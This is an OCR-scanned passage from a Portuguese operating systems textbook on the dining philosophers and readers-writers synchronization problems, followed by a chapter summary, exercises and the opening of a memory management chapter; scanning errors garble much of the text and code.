petira todo o processo. Mas essa pro post a tambem fal ha, 
embora por uma razao diferenie. Com um pouco de azar, 
todos os filósofos poderiam comeęar o algoritmo simulta- 


neamente; pegando seus garfos esquerdos e, vendo qiie 
sens garfos direilos nao estariam dispomveis, devolveriam 
seus garfos esquerdos, espetarłam, de novo pegariam seus 
garfos esquerdos simultaneamentc, e assim pcrmanece- 
riam para sempre. Uma skuaęao como cssa — na qual to¬ 
dos os programas continuam cxcaitando indefinidamemc, 
mas falham ao teniar progredir — e cha mada de inamęao 
{stawation). {E e assim ęhamada mesmo quando o próbie- 
rna nao ocorre cm urn re sta u ranie i la liano o u eh i nes.) 

Mas entao voce poderia pensar que, se os filósofos es- 
perassem por um tempo aleatório, cm vez de esperarem 
por um tempo fixo depois de fal ha rem ao pegar o garfo do 
lado direito, a probabilidade de tudo continuar intertrava- 
do, mesmo que por uma hora, seria muito pequena. Essa 
observaęao e verdadeira, e H em quase todas as aplicaęóes, 
teniar de novo mais tarde e uma abordagem adotada. Por 
cxemplo, na popular rede local Ethernet, se dois computa- 
dores enviain um pacotc ao mesmo tempo (lcvando a uma 
cotisao de pacotes), cada um espera por um tempo alca- 
lório antes de lent ar novamente; na pratica, essa soluęao 
funciona bent. Contudo, para algumas aplicaęoes seria pre¬ 
fekci uma soluęao que sempre fosse vaUda e nao falhasse 
por causa de urna serie improvavel de rtumeros aleatórios, 
Pense, por exemplo, no controlc de seguranęa em uma ust¬ 
na de energia mielcar. 

Um aperfeięoamemo da soluęao mostrada na Figura 
2.37 que nao apresenta impasse nem inanicao e proteger 
os cinco co ma nd os que segiteni a chamada think com um 
semaforo binario* Antes de comeęar a pegar garfos, um ti- 
lósofo faria um down no mutex. Depois dc trocar os garfos, 
cle faria utn up no mutex. Do ponto de vista teórico, essa 
soluęao e adeqtiada. Do porno de vista pralico, ela apre¬ 
senta um problema de desempenho: somente um Filósofo 
por vez pode comer a qualquer insiante. Com cinco garfos 
dispomVets r seria possfvel permitir que dois filósofos co- 
messem ao mesmo tempo. 

A soluęao apresentada na Figura 2.38 ć livre de impas¬ 
se c permite o maximo paraJelismo a um nu mero arbitra rio 
de filósofos. Ela usa um arranjo, estado, para controlar se 


#define N 5 


/* numero de filósofos */ 


void philosopherfint i) 

while (TRUE) { 
think(); 
take_fork(i); 
take„fork((i+1) % N); 
eat{); 

put_fork(i); 
put_fork((i+1) % N); 

} 

) 


/* i: numero do filósofo, de 0 a 4 */ 


/* o filósofo esta pensando */ 

/* pega o garfo e$querdo */ 

/* pega o garfo direito; % e o operador módulo *j 
f* hummm! Espaguete*/ 

/* devolve o garfo esquerdo a mesa */ 

/* devolve o garfo direito a mesa */ 


1 Figura 2.37 Uma soluęao errada para o problema do jantar dos filósofos. 
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#define IM 5 

#ctefine LEFT (i+N-1)%N 

#define RIGHT (i+1)%N 

#define TH INKI IMG 0 

#define HUNGRY 1 

#define EATING 2 


typedef int semaphore; 
int siate]N]; 

semaphore mutex = 1; 
semaphore s[IM]; 


/* numero de filósofos 7 

/* numero do vizmho a esquerda de i 7 

r numero do vizinho a direita de f 7 

ł* o fiEósofo esta pensando 7 

r o filósofo esta tentando pegar garfos 7 

r o filósofo esló comendo 7 

t semaforos sao um tipo especial de int 7 

i* arranjo para controiar o estado de cada um 7 

r exclusao mutua para as regioes criticas 7 

t um semóforo por filósofo 7 


vo\6 philosopherfint i) 

£ 

while (TRUE) { 
think(); 
take_forks(i); 
eat(); 

put_forks(i); 

} 

i 


/* i: o numero do filósofo, de 0 a IM~1 7 

i* repete para sempre 7 
/* o filósofo esta pensando 7 
T pega dois garfos ou bloqueia 7 
/* hummm! Espaguete! 7 
r devolve os dois garfos a mesa 7 


void take m forks(int i) 

{ 

down(&mutex); 
statefi] = HUNGRY; 
test(i); 
up(&mutex); 
down(&s[i]}; 

} 


/* i: o numero do filósofo, de 0 a EM-1 7 

i* entra na regiao crftica 7 

r reglstra que o filósofo esta faminio 7 

i* tenta pegar dois garfos 7 

/* sai da regiao crftica 7 

/* blogueia se os garfos nao foram pegos 7 


void put_forks(i} 

{ 

down (&m ute x); 
statefi] = TH INKI NG; 
test(LEFT); 
test(RJGHT); 
up(&rmjtex); 


/* i: o numero do filósofo, de 0 a M-1 7 

r entra na regiao crftica 7 

J* o filósofo acabou de comer 7 

/* vó se o vizinho da esquerda pode comer agora 7 

r ve se o vizinho da direita pode comer agora 7 

i* sai da regiao cntica 7 


void test(i)/* r: o numero do filósofo, de 0 a N-1 7 

£ 

if (siatę [i] == HUNGRY && State]LEFT] 1= EATING && statefRIGHT] != EATING) { 
statefi] = EATING; 
up(&s[i]): 


} 


} 


1 Figura 2 .38 Uma solucao para o probiema do jantar dos filósofos. 


um filósofo esta comendo, pensando ou fa minio (tentando 
pegar garfos), Um filósofo só pode mudar para o estado 'co¬ 
mendo' se nenhum dos vizinhos esiiver comendo. Os vizi- 
nhos do filósofo /sao definidos pdas matros LEFT e RIGHT. 
Em outras palavras, se / for 2 r LEFT sera I c RIGHT sera l. 

O programa usa um arranjo de semaforos, um por fdó- 
sofo; assim, filósofos famintos podem ser bloąueados se os 
garfos neccssarios estiverem ocupados* Obsene que cada 
processo execuia a rotina phibsopher como stu código Prin¬ 
cipal mas as oulras rolinas — take_fork$, put_forht test — 
sao rotinas ordinarias, c nao processos separados. 


2.5,2 I O problem a dos leitores e escritores 

O problema do jantar dos filósofos e ulil para modelar 
processos que competem pelo acesso exclusivo a um nu¬ 
mero timiiado de recursos, como dispositivos dc E/S. Ouiro 
problema famoso c o caso dos leitores c escritores (Courtois 
et aL 1971), que modela o acesso a urna base de dados. 
Imagine, por exemplo, um sistema de re$erva de linhas ae- 
reas, com muitos processos em competięao, ąucrcndo lere 
escrever. Ć aceiiavel que miiltiplos processos leiam a base 
de dados ao mesmo tempo, mas, se um processo estiver 
atualizando (escrevendo) na base de dados, nenhum outro 
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processo pode ter acesso ao banco de dados, nem mesmo 
os leitores. A questao e: como programar os leitores e os 
escritores? Urna soluęao e mosirada na Figura 239. 

A pa i lir dessa soluęatfc para ohtero acesso a base de da¬ 
dos, o primeiro lei tor faz um down no semaforo db, Os lei¬ 
tores subsequentes merameme incrememam um contador, 
rc. Conforme saem, os leitores decrementam o contador de 
1 e o ultimo leitor a sairfaz um up no semafor o, permitindo 
que um eventual escritor bloqueado entre. 

A soluęao apresentada aqui centem implidlamente 
u ma de cisa o sutil que vale a pena comentar, Suponha que, 
enquanto um leitor esta usando a base de dados r um mitro 
leitor chegue. Como ter dois leitores ao mesmo tempo nao 
e um problem a r o segundo leitor e ad mit ido. Leilores adi- 
donais tambem padem ser admitidos se chegarem. 

Agora imagine que apareęa um escritor; Este nao pode 
ser admitido na base de dados, pois escritores devem ter 
acesso exclusivo. O escritor e, en ta o, suspenso. Leitores 
adieionais chegam. Enquanto houver pelo menos um lei¬ 
tor ativo, leitores subsequentes serao admitidos. Como 
consequencia dessa estrategia, enquamo houver um fluxo 
estavel de leitores chegando, todos entrarao assim que che- 
garem, O escritor permanecera suspenso ale que nenhum 
leitor esteja presente, Se um novo leitor chegar — digamos, 


a cada dois segundos — e cada leitor levar cinco segundos 
para fazer sen trabalho, o escritor nunca entrara. 

Para cvitar cssa situaęao, o pi ogra ma poderia ser escri- 
to de modo um pouco diler cnie: se um leitor chegar quan- 
do um escritor cstiver esperando, o leitor sera suspenso 
logo depois do escritor, ern vez de ser admitido de imediato. 
Dessa mancira, um escritor, para terminar, predsa esperar 
por leitores quc estavam ativos ąuando cle chegou, mas 
nao por leitores que chegaram depois dele. A desvanta- 
gem dessa soluęao e que sc consegue menos coocorrcnda 
c, portanto, um desempenho menor. Courtois ct al. apre- 
sen tam urna soluęao que da prioridade aos escritores. Para 
mais detalhes, consulte o arligo. 


2.6 


Pesquisas em processos 
e threads 


No Capftulo 1, estudamos algo mas das pesąuisas atuais 
em estmmra de sistemas operacionais. Neste capftulo e nos 
subsequentes, examiuaremos pesquisas mais especfficas, 
inidando com os processos. Aos poucos, tornase claro 
que alguns assimtos sao muito mais estaveis que oufros. A 
maioria das pesąuisas tencie a ser sobre tópicos novos, em 
vez daąueles que nos rodeiam ha decadas. 


typedef int semaphore; 
semaphore mutex = 1; 
semaphore db = 1; 
int rc - 0; 


r use su a imaginaęao 7 
r co nt rola o acesso a Vc ł 7 
r controia o acesso a base de dados 7 
F numero de processos lendo ou querendo ler 7 


void reader(void) 

{ 

while (TRUE) { 
down(&mułex); 
rc = rc + 1; 

Ef (rc == 1) down(&db); 
up(&mutex); 
read„data_base(); 
down(&mutex); 
rc = rc - 1; 

Ef (rc = 0) up(adb); 
up(&rmiex); 
use data read(); 

} 

1 


r repete para sempre 7 
/* obtśm acesso exclusEvo a 'rc’ 7 
F urn leitor a mais agora 7 
F se este for o primeiro leitor... 7 
F libera o acesso exclusivo a 'rć 7 
F acesso aos dados 7 
F obtem acesso exclusivo a L nc’ 7 
/* um leitor a menos agora 7 
F se este for o ultimo leitor... 7 
F libera o acesso exclusivo a ‘rc’ 7 
I* regiao nao critica 7 


void writer(void) 

{ 

while (TRUE) { 

thlnk_up_data(); 
down(&db); 
write_data_base(); 
up(&db); 

1 

) 


F repete para sempre 7 
F regiao nao cntica 7 
/* obtem acesso exofusEvo 7 
F atu a Iza os dados 7 
F libera o acesso exdusivo 7 


I Figura 2.39 Urna soluęao para o problema dos leitores e escritores. 
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O conceito de um processo e um exemplo de algo mui- 
to bem estabelecido. Quase todo sistema tem alguma noęao 
de um processo como um redpiente para agrupar recursos 
rcladonados, como um ospa co de endcreęarnemo, ihreads, 
arquivo$ abertos, permissóes de protcęao etc, Sistemas di- 
ferentes fazcm essc agrupamento de rnandra um pouco 
diferente, mas trala-se apenas de dlferenęas de engcnharia. 
A kicia basica nao e tao controvcrsa e ha pouca pesqui$a 
nova sobie o tema processos. 

Os ihreads sao u ma ideia mais nova que os proccssos, 
mas tern havido bastantes ieflcxóes sobi e des. Alem disso, 
otasionalmente aparccem artigos sobre ihreads tratando, 
por cxemplo, dc aglomcrados dc muUipmcessadorcs (Tam 
et aL 2007) ou do dirnensionamemo do niimero de ihreads 
em um processo para cem mil (Von Behren et aL, 2003). 

A sineronizaęao dc proccssos esta muito mais defmida 
agora, mas dc vcz cm quando ainda ha arligos, como aquc- 
les sobre processa niemo concorrcntc sem tocks (Fraser c 
Harris, 2007) ou sineronizaęao no modo nao bloqueante 
em sistemas de lempo real (Hothmuih e Haertig, 2001). 

O escalonamcnto (tamo ti ni proce ssador quanto mul- 
tiprocessador) ainda c um tópico rcccme e caro a alguns 
pesąutsadores. Alguns lópicos sendo pesąuisados incluem 
escalonamcnto de dispositivos móveis em termos de efi- 
dencia energetica (Yuan e Nahrstedt, 2006) r esca łona men - 
to cotn tecnologia hyperthreading (Bulpin e Pratt, 2005), 
modos de reduzir a ociosidade da CPU (Eggert e Toucłi, 
2005) e escalonamcnto de sistemas dc tempo virtual (Midi 
et aL, 2001), Cent u do, poucos projetistas de sistemas opc- 
radonais andam desesperados pcla falta dc um algoritmo 
deccntc para o escalonamcnto dc threads — portanto, pa- 
rece que essc lipo de pesquisa c mais um desejo do quc 
urna nccessidade de pe$quisadores. De modo gcral, pro¬ 
ce ss os, threads e escalonamento nao sao mais tópicos de 
pesquisa tao procurados como a mes. A pesąuisa avanęou. 

frfrl Resumo _ 

Para ocultar os efeitos das imerrupęoes, os sistemas 
opcracionais ofcreccm urn modclo conceitual quc consis- 
te cm processos seąuenciais exeaitando em paralelo. Os 
proccssos podem ser criados c terminados dinamicamenie. 
Gada processo tern sen próprio espaęo dc cndereęamento. 

Para algumas aplicaędes, e u lii ter multiplos threads de 
eon trok dentro dc um unico processo, Hsses threads sao cs- 
calonados independentemente e ca da um tem sua própria 
pilha, mas todos os threads em um processo compartilham 
um espaęo dc cndcrcęaniemo comum. Threads podcm ser 
implemeutados no cspaęo do usuario ou no nucleo. 

Os processos podem se comumcar uns coni os otiiros 
por meio de primitivas de comunicaęao entre processos, 
como semaforos, monitoresou mensagens. Essas unidades 
basicas sao usadas para assegurar quc dois proccssos nunca 
estarao cm suas regiócs criticas ao mesmo tempo — urna 


situaęao que levaria ao caos. Um processo pode estar exe- 
cutando, ser executavel ou bloqueado e alterar o estado 
quando ele ou um outro processo executa uma das unida- 
des basicas dc comunicaęao entre processos. A comunica¬ 
ęao interthread c scmclhanrc* 

As primihvas de comunicaęao entre processos podem 
ser usadas para resolver problemas como o produtor-con- 
sumidor, o jantar dos fiiósofos e o leitor-escritor. Mesmo 
com essas primitivas, devem-se tomar cuidados para evitar 
erros e impasses. 

Muitos algoritmos de escalonamento tem sido estuda- 
dos. Alguns deles sao usados printipalmenie em sistemas 
em lote, como a tarefa makat rui primdro. Outros sao comuns 
aos sistemas em lote e aos sistemas imeraiwos—como o es- 
calonamento circtilai; o escalonamento por prioridades, as 
filas mtiltiplas, o escalonamento garantido, o escalonamen¬ 
to por loteria e o escalonamento por fraęao justa. Alguns 
sistemas fazem uma scparaęao entre o niecąnismo de esca- 
lonamento e a politica dc escalonamento, o ąuepermiteaos 
usuarios um controlc sobre o algoritmo dc escalonamcnto* 

Problemas 

1. Na Figura 2.2, sao mostrados Eres esiados de processos. Na 
teoria, com tres esiados poderia haverseis transięoes, duas 
para cada estado* Conuido, someme quatro transięoes sao 
mostradas. Ha alguma circunstancia na qua! uma delas 
ou ambas as transięoes nao ilustradas possam ocorrcr? 

2. Suponha que voce seja o projetista de uma arąuUeuira de 
computador awmęada qite fez o chavearuento entre pro¬ 
cessos por hardware em vez de usar interrupęoes. De que 
informaęao a CPU precisaria? Descreva como o processo 
de chaveamemo por hardware poderia fund ona r. 

3i Em todos os computadores atuais, pęto menos uma parte 
dos manipuladores dc intcmipęao (imerrupt handlcrs) c 
escriia em lingua gem assembly. Poi que? 

4 . Quando uma interrupęao ou uma cha mada de sistema 
transfere o controle para o sistema opcracional geral- 
mente e u$ada uma area da pilha do nucleo sępa rada da 
pilha do processo interrompido. Por quc? 

5. Ta ref as multiplas podem ser executadas paralelamente 
e terminar mais rapido do que se livessem sido execu- 
tados sucessivamente. Suponha que duas tarelas, cada 
uma predsando dc dez tninutos do tempo da CPU H co- 
meęassem sini ul tanea menie. De q u anto tempo o ultimo 
precisara para terminar se das forem executados sticcssi- 
vamenie? Quanto tempo se forem exccutadas paralela- 
mente? Suponha 50 por cen to dc espera de E/S, 

6 . No t.exto, foi estabelecido que o model o da Figura 2,S(a) 
nao era adequado para um servidor dearquivos que usas- 
se uma cache na memória. Por que nao? Cada processo 
poderia ter sua própria cache? 

7. Se um processo multithread bifurcar, ha problemas se o 
fil ho topią todos os threads do pa i. Suponha que urn dos 
threads originais estivesse esperando por uma entrada do 
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ledado. Agora dois ihreads eslao esperando ptfla etura- 
da do teclado, it m em catlai processo, Esse problem a pode 
ocorrcr em proccssos de ihread dni co? 

8. Na Figura 2.6, e most rado urn servidor da Web multithrcad. 
Se o urtico modo de ler a partirde urn arquivo for o bloqiicio 
norma! da cha mada dc sistema read, voce acha que threads 
de usuario ou de nudeo estao sendo usados para o servidor 
da Web? Por que? 

9* No texto, deserevemos um semdor da Web imiliithread, 
mostrando por quc dc e md hor qtic um servidor dc 
ihread unicoe om servidorde maquina de estados finitos. 
Ha aiguma circunstancia na qual um semdor de ihread 
unico poderia ser mclhor? Dć um exemplo, 

10. Na Tabela 2.4, o conjumo de registradores e relacionado 
como um i tern por ihread, c nao por processo, Por que? 
(A finał a maąuina leni sonie nie um conjumo de regis- 
iradores.) 

11. O que laria um ihread desisiir volumariamente da CPU 
chamando thmni_ykW (Aimal como nao ha interrupęao 
period i ca de relógio, ele pode nunca mais obier a CPU de 
volta.) 

12. Urn ihread pode sofrer precmpęao por u ma interrupęao 
de relógio? Em caso afirmativo, sob quais ci ren n stand as? 
Do conirario, porquc nao? 

13. Neste problema, voce deve comparar a leitura de um ar- 
quivo usando um semdor de arquivos monothread e um 
semdor multithread, Sao necessarios 1 5 ms para obier 
unia reqiiiśięao de trabalho, despacha-la e fazer o restante 
do processainenio necessario, presumindo que os dados 
essenciais esiejam na caclic de blocos. Sc for ncccssa- 
ria urna opcraęao de disco — como ocorre em um teręo 
das vezes—, sera preciso um tempo adicional de 75 ms, 
d uran te o qual o ihread donnę, Quamas rcqutsięÓcs/se- 
gundo o servidor pode tratar se for monothread? E se for 
multithrcad? 

14. Qual a maior vantagem dc implcmentar threads no espa¬ 
ęo do usuario? Qual e a maior desvan ta gem? 

15. Na Figura 2.10, as criaęóes de threads e as mensa gen s 
impressas pdos threads sao intercaladas aleatoriameme, 
Ha algum modo de impor que a ordom seja estritamente 
ihread 1 criado, ihread 1 imprime mensagem, ihread 1 sal 
ihread 2 criado, ihread 2 imprime a mensagem, ihread 2 
sai e assim por dianie? Em caso de resposia afirmativa, qual 
e esse modo? Em caso de resposia negativa, por que nao? 

16. Na discussao sobre variavcts globaiś em threads, usa- 
mos urna rotina create^ global para alocar memória a um 
pomeiro para a variavel, em vez de alocar diretamente a 
própria variavel, Isso e es sen ciał ou as rotina s poderiam 
funcionar multa bem apenas com os próprios valores? 

17. Considere um sistema no qual threads sao implemen- 
lados imciranienie no espaęo do usuario, sendo que o 
sistema de tempo de execuęao sofre urna interrupęio de 
rdógio a ca da segundo. Suponha que u ma inierrupęao dc 
rdógio ocorra enquamo algum ihread cstivcr exccutando 
no sistema de tempo de cxccuęao. Que problema poderia 
ocorrcr? O que voce sugere para resolve-lo? 


18. Suponha que um sistema operacional nao tenha urna 
eh a mada de sistema como a select para verificar previa- 
mente se e seguro ler um arquivo, um pipę ou algum 
dispositivo, mas ele permite que "'alarm docks" sejam 
setados, os quais interrompem chamadas de sistema blo- 
queadas. Ź possivel implementar um pacoie de threads, 
no espaęo de usuario, sob essas condięoes? Comente. 

19 . O problema dc inversao de prioridades discutido na Seęao 
2.3.4 pode acontecer com threads de usuario? Por que? 

20. Na Seęao 2.3.4, foi descriia unia sitnaęao com um proces' 
so dc al la priori da de, H t c um dc baka prioridade, L que 
levava H a um laęo inftnito. O mesmo problema ocorrena 
se fosse usadp o escalonamenlo circular em vez do esca- 
lonamenio por prioridades? Comente. 

21. Em um sistema com threads, quandosao utilizados threads 
de usuario, ha unia pilha por ihread ou unia ptlha por 
processo? E qtiandose usam ihreads de nucleo?Explique. 

22. Quando um computador esta sendo desenvolvido, cle ć 
antes simulado por um programa quc cxccuta urna ins- 
truęao por vez. Mesmo os nuiitiprocessadores sao simtu 
lados de modo estritamente seąuendal. Ć posswcl quc 
ocorra urna condięlo de corrida ąuando nao ha eventos 
simultaneos como nessas simulaędes? 

23. A soluęao de espera ociosa usaiido a variavel tum (Figura 
2.1S) funciona quando os dois processoś estao executan- 
do em um multiprocessador de memória compartiIliada, 
isto e, duas CPUs compartilhando lima memória comurn? 

24. A soluęao de Peterson para o problema da exclusao mu- 
tua, inostrado na Figura 2J9 r funciona quando o escalo- 
namento do processo for preemptWo? E quando o escało¬ 
na merno nao for preemptivo? 

25. Faęa um esboęo de como um sistema operacional capaz dc 
desabilitar intcrrupęoes poderia implementar semaforos, 

26. Mostre como os semaforos contadores (isto e, os sema- 
foros que podem conter um valor arbitrario) podern ser 
implcmcntados usando somente semaforos binarios c 
simples Enstruęoes de maąuina. 

27. Se um sistema tern somente dois proccssos, tein sentido 
usar urna barretra para sin ero ni za-los? Por que? 

28. Dois threads podem, no mesmo processo, sineronizar a 
panir do uso de uin semaforo de nudeo se os threads 
forem implemcmados pelo nudeo? E se os threads fos- 
sem implemcmados no espaęo do usuario? (Suponha que 
nenhurn ihread em qualqueroutro processo tenha acesso 
ao semaforo,) Comente su as respostas, 

29. Sincronizaęao com monitores usa variaveis de eon di ęa o 
e duas operaęóes especiais, wait e signal. Urna forma mais 
gera! dc sincronizaęao seria ter u ma tinica primitiva, 
waituntil, que possufssc um predicado booleano como pa¬ 
ra meno. Assim, a Ig nem poderia dizer, por exemplo, 

waituntil x<0 ou y + z <n 

A priniitka signal nao seria mais necessaria, Esse esque- 
ma e daramenie mais geral que o proposto por Hoare ou 
Brinch Hanscn, mas nao ć utiiizado, Porguc? Di ar. pense 
na implementaęao. 




Sn#w 


104 Sistema$ operacionais modernos 


30. Urn rcstaurante dc fasi-food rem quatro lipos dc empre- 
gados: (1) anotadores dc pedido, que a nota m o pedido 
dosclientcs; (2) cozinheiros, quc preparam a comida; (3) 
cmbaladores, quccotocam a comida nassacolas; c (4) cai- 
xas, que emregam as sacolas para os clicmcs c recebem 
o dinlreiro deies, Cada empregado pode ser observado 
como um processo seąuenctat de comumcaęao. Qual for¬ 
ma dc comunicaęao entre processos des usariam? Rela- 
cione esse modclo aos processos no UNIX. 

31. Ima ginę um sistema por troca de mensagens que use cai- 
xns postais. Quando se envia para uma caixa posiał cheia 
ou tema-se receber de u ma caixa postał vazia, um pro¬ 
cesso na o bioqueia. Na verdade, de obtem um código de 
erro, O processo responde ao código de erro apenas ren¬ 
ta ndo novameme, sucessivamentc P ate que ele consiga. 
Esse esqueina ieva a condięoes de corrida? 

32. Os computadorcs CDC 6600 podiam lidar sunuliaiiea- 
mente com ate dez processos dc E/S, usando u ma forma 
imeressante de escakmamento circular diamada com- 
partUhamento dc processador. Um chavcamcnto dc 
processo ocorria depo i s dc cada mstruęao; assim, a instru- 
ęao 1 vinha do processo i, a instruęao 2 vinha do proces¬ 
so 2 c asslm por diante, O chaveaniemo do processo era 
feilo por um hardware especial e a sobrecarga era zero. Se 
um processo precisasse de T segundos para terminar sua 
execuęao, na ausencta de cottipetięao, ąuanio tempo seria 
necessario se o comparttlhamemo do processador fosse 
usado com n processos? 

33. Seria poszyci estabeleccr unia inedida sobre o ąuanio utn 
processo e limilado peia CPU ou limitados por E/S anali- 
sando o código-fonie? Como isso poderia ser detemiina- 
do em tempo de cxecuęao? 

34 . Na seęao 'Quando escalonar', foi mencionado que P algu- 
mas vezes, o escalonamento poderia ser melhorado se um 
processo import antę fosse passwel de desenipenhar um 
papel, ao ser bloąueado, na seleęao do próximo processo 
a exeauar Pense em u ma situaęao na qual isso poderia 
ser usado e explique como. 

35. As medidas de um certo sistema mostram quc o processo 
medio execma por um tempo T antes de ser bloąueado 
para E/S. Um chavcamento dc processos rcqucr um tem¬ 
po S cfetivamenie gasło (sobrecarga). Para o escalona¬ 
mento circular com um quantum Q t de unia formula para 
a eficiencia da CPU em cada um dos seguintes casos: 

(a) Q - ». 

(P>) Q>T. 

(C) S<Q<T. 

(d) Q-S. 

(*) Q próximo de 0. 

36. Cinco tarę fas estao esperando para serem executadas. 
Seus tempos de execuęao previstós sao 9, ó, 3, 5 e X. Em 
que orderu elas deveriam ser execuladas para mininiizaro 
tempo medio deresposta? (Sua resposia dependera de X.) 

37. Cinco tarefas em !otc P A a E, chegam a um centro dc 
coniputaęao quasc ao mesnio tempo. Elas tern tempos 


de cxecuęao estimados cm 10, 6, 2, 4 c 8 minutos, Suas 
prioridades (exiemamenie determinadas} sao 3, 5, 2. 1 e 
4, respeaivameme P sendo 5 a priońdade mais alta, Para 
cada um dos seguintes algoritmos de escalonamento, dc- 
terminc o tempo medio de ida c voka. Ignore a sobrecarga 
dc chavcamento de processos. 

(a) Circular. 

tb) Escalonamento por prioridades. 

(c) Primeiro a ckegar f primeiro a ser semdo (exccute na or¬ 
dom 10, 6, 2, 4, 8), 

(d) Tarę fu mais curta primeiro. 

Para (a), presuma que osistema e mu hi próg ram a do c quc 
cada tarefa obtenha sua fra^aojusta da CPU. Para os itens 

(b) a (d) H considere a execuęao dc somente uma tarefa por 
vez, ate que temimc. Todas as tarefas sao com pieta menie 
limitadas peła CPU. 

38 . Um processo cxecutando no CTSS precisa de 30 quan- 
la para terminar. Quantas vezes ocorrera uma troca para 
a memória, induindo a primeira vez (antes de execuiar 
qualqucr coisa)? 

39 . Vocc lem ideia de como impedir quc o sistema de priori- 
dade do CTSS seja enganado digitando-se a tecla <Entra> 
aleatoriamente? 

40. O ałgoritmo do cnvdhcdmento (aging) com a - 1 /2 esia 
sendo nsado para prever tempos de execuęao. As ąuatro 
exccuę6cs anteriores, da primeira a mais rccemc, sao 40, 
20, 40 c I 5 ms. Qual c a prcvisao da próxima cxecuęao? 

41 . Um sistema de tempo real tern ąuairo evenios periódicos 
com period os de 50, 100, 200 e 250 ms cada. Suponha 
que os quaim cyentos requeirain 35, 20, 10 c x ms dc 
tempo de CPU, respectivamenie. Qual e o maior vaJor dc 
xpara que o sistema seja escalonavel? 

42. Explique por que o escalonamento em dois nfveis e bas- 
tanie usado. 

43. Um sistema de tempo real precisa contro lar duas chama- 
das de voz, cada uma delas executada a cada 5 jus e eon- 
sumlndo 1 ms do tempo da CPU por surto, alem dc um 
vfdeo de 25 quadros/s r e cada quadro requer 20 ms do 
tempo da CPU. Esse sistetna pode ser escalonado? 

44. Considerc um sistema no qual se deseja separar a polftica 
e o mecantsmo para o ałgoritmo dc escalonamento dos 
threads dc nudeo. Proponha um mcio de chegar a esse 
objetivo. 

45. Na soluęao para o próbie ma do jantar dos filósofos (Figura 
2.38), por que e airibufdo HUNGRYh variave) de estado 
na rot i na take_forks? 

46. Obscrvc a rotina put^forks da Figura 2.38, Suponha quc 
a variavel ^ratef/] fosse airibuida THINKING ifepois das 
duas chamadas de test, e nao antes. Como isso poderia 
a fet ar a soluęao? 

47 . O problema dos leitores e escrilores pode ser formulado 
dc varias mandras, dependendo de quando cada ca tego- 
ria de processos pode ser inidada* Descreva, dęta I ha da- 
ruente, tres variaę<3es diferentes do problema, cada uma 
favorecendo (ou nao) algurna ca tego ria de processos. Para 
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cada variaęao, especifiąue o qtie acomece quando um lei- 
tor ou li in escriior fica pranto para ter acesso ao banco de 
da dos e o quc ocorre quando um processo a ca ba dc usar 
o banco dc dados* 

48 . Escrcva um script do shell que produza um arquivo dc 
numeros śequenciais lendo-se o ultimo nu mero no ar- 
quivo, adicionando-sc I a cle c, entao, anexando-o ao 
arqutvo. Execute urna instancia do script em background 
(segundo piano) c o utrą cm foreground (pomeiro piano), 
cada urna realizando acessos ao mesmo arquivo. Q li anto 
tempo iranscorre a mes dc se manifestar uma condięao de 
disputa? Qual ć a regiao crfiica? Modifiquc o script para 
impedira disputa. (p/ót;use 

In file file.lock 

para proteger o arquivo dc dados,) 

49. Imagine um sistema operacie na 1 que permita semafoms. 
Iniplememe um sisiema de mensagens. Escreva as rotinas 
para enviar c rcccbcr mensagens, 

50 . Rcsolva o próbie ma do jantar dos fitósofos u&ando moni- 
tores em ?ez de semafoms, 

51. Suponha que uma universidade, para mostrar como e po- 
liticamcntc corrcta, ap!iquc a doutrina da Suprema Corte 
dos Estacios Unidos, "Separado mas igual e merentemente 
desiguaT, para genem c raęa r pondo firn a sua prał i ca dc 
tonga data dc banhdros no campussegregados por genero. 


Comudo, como uma concessao a tradięao, da deereta que, 
quando uma mulher estiver no banheiro, outra mulher 
podera emrar, mas um bomem na o c vice-versa, Um sina] 
com um marcador deslizante, na pona de cada banheiro, 
indica em qua! dos tres esiados o banheiro se enconira: 

Vazio 

Com mulher 
Com bomem 

Escrcva, cm su a linguagem dc programaęao favorita H as 
seguimes roi i nas: mulherj}tter^ętttrar f hemem _ąuer_emmr t 
mulherjai, homemjal Vocc pode usar os comadores c as 
tecntcas dc sincronizaęno que quiscr. 

52 , Reescreva o pmgrania da Figura 2.18 para iratar mais de 
dois processos. 

55 . Escreva um problem a produtor-consumidor quc use 
threads c compartilhc um buffer comum. Contudo, nao 
use se tiki f oroś ou quatquer outra primiliva de sineroni- 
zaęao para proteger a estrutura de dados compartilbada, 
Apenas deixe cada thread ter acesso a eles q uando quiscr. 
Use sleep e wakeup para tratar as condięoes de buffer cheio 
c buffer vazio, Yeja quamo tempo lcva atć ocorrer uma 
condięao de disputa fatal. Por exemplo, voce pode ler o 
p rodu tor imprimindo um nu mero a cada imervalo de 
tempo. Nao imprima mais do que um nu mero a cada mi¬ 
nuto, porque a E/S poderia a fet nr as condięoes de corrida. 
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Gerenciamento de memória 


A memória Principal (RAM) e um recurso importam 
te que deve ser gerendado com muito cukiado, Apesar de 
alualmcnle os computadores pessoais possnfrem memórias 
dez mil vezes maiores que o IBM 7094 (o maior compu- 
lador do mundo no imdo dos a nos 1960), os pr ogra mas 
tomam-se maiores muito mais rapidamenie do quc as me¬ 
mórias. Parafraseando a Lei dc Parkinson, pode-se a firma r 
que ''programas tendcm a sc expandir a fim de ocupar toda 
a memória dispomver, Neste capitulo, estudaremos como 
os sistemas operacionais criam abstraęoes a partir da me¬ 
mória e como as gerendam. 

O que todo programador deseja e di spor de unia me¬ 
mória mJini La menie gran dę, rapida e nao volaLil o u seja, 
lima memória que nao perdesse sen comeudo ąuando fal- 
tasse energia, E por que nao lambem a um baixo custo? 
Infelizmente, a lecnologia aiual nao comporta essas memó¬ 
rias. Talvez voce seja capaz de desenvolve-las. 

Qual e a segunda opęao? Ao longo dos a nos, as pessoas 
descobriram o conceito de hierarąuia cle memórias, em 
que os computadores tem alguns megabytes de memória 
caclie muito rapida, de custo alto e volatil, alguns giga byt es 
de memória priori pal vo!atii de velocidade e custo me di os 
c alguns lerabytes de armazenagem em disco nao volatil 
dc vcloridade c custo baixos r para nao fakir do armazena- 
mento removfvel r como DVDs e dispositivos USB. A funęao 
do sistema operacional e abstrair essa hierarąuia em um 
modelo uiil e, entao, gerenciar a abstraęao* 

A parte do sistema operacional que gerencia (parcial- 
mentc) a hierarąuia dc memórias ć denominada gerencia - 
dor de memória. Sua funęao e gerenciar a memória de 
modo eficienie: manier o controle de quais partes da me¬ 
mória eslao em uso e quais nao estao, alocando memória 
aos processos ąuando des predsam e liberando-a ąuando 
esses processos ter mi nam. 

Neste capitulo conheceremos varios csąucmas dife- 
rentes de gerenciamento de memória, desde os mais sim- 
